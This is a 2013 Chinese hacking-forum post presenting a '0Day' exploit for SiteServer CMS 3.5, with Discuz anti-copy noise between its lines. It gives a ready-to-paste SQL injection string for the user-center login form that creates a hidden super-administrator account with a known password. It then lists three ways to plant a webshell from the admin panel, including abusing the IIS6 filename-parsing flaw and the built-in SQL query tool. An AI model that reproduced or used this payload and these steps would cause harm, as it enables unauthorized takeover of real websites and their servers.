中国网络渗透测试联盟
标题:
SiteServer CMS 0Day
[打印本页]
作者:
admin
时间:
2013-1-11 21:10
标题:
SiteServer CMS 0Day
经测试秒杀最新的3.5版
. F$ a% h& W$ B) f1 {) u( A
! M8 U8 |+ U% E) c. u
stieserver官网:
www.siteserver.cn
* M. `0 H8 ]/ r4 W
/ u. h8 E; ~9 f. A
* h6 L' B; k0 Y/ z8 y! }: N
0 w$ Q2 V8 n+ U G, j" R
EXP:
5 I3 q* B9 M' p5 l
6 i9 ~/ V+ b2 X1 y/ g: I
直接访问UserCenter/login.aspx
/ E* @: J) \* C1 q0 {) i
4 ^0 n* t y% Q; D& r
/ `" d/ @) y! Z+ R5 W5 A
5 @3 k' n3 y- f8 V3 \
用户名处输入:
, o: Q) |9 i i4 U {
* H( Y( `6 i3 M7 _
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
' ^7 J" S5 b* X" E0 ^
1 s$ l$ [; B& J) j
1 U+ W1 y8 n3 a1 k5 D5 Y
\4 P: L$ h) D
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
* t8 `6 Z+ ?: M' A
! U/ {( N1 s+ c5 P: P
i5 g! Y! \, e W. b
_ I; X/ X3 v; p1 X
之后再访问后台SiteServer/login.aspx用插入的用户登陆
7 f7 d5 _# B3 `- e* S* r' s
0 f7 \) u( z6 I1 V/ Y
/ D" d8 { y& [1 M" @9 P; w
7 i9 m; h0 D, V6 j& |
后台拿webshell的三种方法:
% h% j# r# W& e& l2 ^! z
% m8 r0 H! D' V' b- D0 V$ V9 V
一、
7 B6 k) L. F+ J3 X+ n7 A
' O' ^2 |5 v5 i9 B; K9 [3 |
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
9 K+ i% X) N7 o. n5 \ i
2 A1 V, I# r9 O8 S
二、
0 V" O5 D6 @0 B! [ }0 W
. q. H f- ^! `
成员权限-》添加用户-》用户名为:1.asp
% E! S9 W/ @4 u! D( L- ` u
2 ?3 ^5 u8 C" k T" y& z) Z8 u6 e
http://127.0.0.1/usercenter/
6 I$ h. k$ l7 h: v" T
) L% g& S# ?: D$ x1 b" _
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
2 O) z: Q: i* O/ D% P& \
2 J' ~ g- v9 H0 T
(ps:后台添加用户时不会验证是否含有非法字符)
( m- @! J6 `, z( l2 w6 i# n3 L
% p+ ?5 }: y5 [
三、
?* n( a3 o" G* K9 a0 `" [9 d
1 b1 J H6 P$ n
系统工具-》实用工具-》机器参数查看
# J0 U5 O8 ` c, R, d5 Q) w
可以看到数据库类型、名称,WEB路径
* f, @" X3 c0 D
2 {; e4 r- u- D8 Z3 f
系统工具-》数据库工具-》SQL语句查询
7 y( U/ h4 R0 O4 m
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。
# L7 F/ T& @! E( T
4 Z4 v* P4 ]- o" T
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2